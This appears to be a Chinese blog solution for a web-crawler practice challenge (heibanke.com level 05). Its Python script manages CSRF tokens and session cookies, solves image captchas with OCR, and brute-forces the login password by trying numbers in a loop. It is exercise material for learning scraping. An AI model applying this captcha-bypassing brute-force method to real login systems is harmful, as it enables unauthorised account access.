1. 程式人生 > >黑板客 -- 爬蟲闖關 -- 關卡05

黑板客 -- 爬蟲闖關 -- 關卡05

ref time pos download 模塊 pytho awl post dde

簡介


爬蟲闖關鏈接:


1. ?http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/

2.? http://www.heibanke.com/lesson/crawler_ex04/

3.? http://www.heibanke.com


知識點:cookie & session , csrf , Web編程,驗證碼識別模塊


提示:本題相較之於前4題的難度在於驗證碼識別問題,為了方便起見,就用了網絡上現成的pytesser模塊,PIL模塊64位Python安裝時可能會遇到一點小麻煩,盡量使用32位Python。


pytesser模塊安裝及使用參考資料:


1. http://blog.csdn.net/evankaka/article/details/49533493

2. http://blog.csdn.net/tianxiawuzhei/article/details/44922843

3. http://blog.csdn.net/bigzhao_25/article/details/52350781


參考代碼


#!/usr/bin/env python
# encoding: utf-8
 
import requests
import sys
import re
import threading
from pytesser import *  
 
reload(sys)
 
sys.setdefaultencoding("utf-8")
 
csrf = ""
username = "Peter"
password = "112233"
captcha_0 = ""
captcha_1 = ""
attack_password = ""
 
website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/"
website_attack = "http://www.heibanke.com/lesson/crawler_ex04/"
website_imageBase = "http://www.heibanke.com"
 
payload_login = {
    "username":username,
    "password":password,
    "csrfmiddlewaretoken":csrf
}
 
payload_attack = {
    "username":username,
    "password":attack_password,
    "csrfmiddlewaretoken":csrf,
    "captcha_0":captcha_0,
    "captcha_1":captcha_1
}
 
s = requests.Session()
s.get(website_login)
csrf = payload_login["csrfmiddlewaretoken"] = payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
 
def Test_verCode(image_path):
    image = Image.open(image_path)   
    verCode_res =  image_to_string(image) 
    return verCode_res
 
def getVerCode(resp):
    global payload_attack
    word_captcha_1 = re.findall('<img src="(.*?)" alt="captcha" class="captcha" />', resp.content)
    word_captcha_0 = re.findall('<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />', resp.content)
    payload_attack["captcha_0"] = word_captcha_0[0]
    Image_URL = website_imageBase+word_captcha_1[0]
    return Image_URL
 
def downloadImage(Image_URL):
    try:
        pic= requests.get(Image_URL, timeout=10)
    except requests.exceptions.ConnectionError:
        print '[-] Image can not download '
    string = '1' + '.png'
    fp = open(string,'wb')
    fp.write(pic.content)
    fp.close()
 
def get_attackResp(verCode_res,attack_password,s):
    global payload_attack
    payload_attack["password"] = attack_password
    payload_attack["captcha_1"] = verCode_res[0:4:1]
    resp_attack = s.post(website_attack,data=payload_attack)
    payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    return resp_attack
 
def main():
    global payload_login
    global payload_attack
    global s
    resp_login = s.post(website_login,data=payload_login)
    payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    image_URL = getVerCode(resp_login)
    downloadImage(image_URL)
    verCode_res = Test_verCode('1.png')
    for i in range(31):
        resp_attack = get_attackResp(verCode_res,str(i),s)
        while True:
            if resp_attack.content.find(u'驗證碼輸入錯誤'.decode('utf8')) == -1:
                break
            else:
                print "[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res
                resp_login = s.post(website_login,data=payload_login)
                payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
                payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
                image_URL = getVerCode(resp_login)
                downloadImage(image_URL)
                verCode_res = Test_verCode('1.png')
                resp_attack = get_attackResp(verCode_res,str(i),s)
                continue
        if resp_attack.content.find(u'錯誤'.decode('utf8')) == -1:
            print "[+]FOUND PASSWORD:" + payload_attack["password"]
            print "\nTEXT:\n" + unicode(resp_attack.content).decode('utf8')
            break
if __name__ == '__main__':
    main()

黑板客 -- 爬蟲闖關 -- 關卡05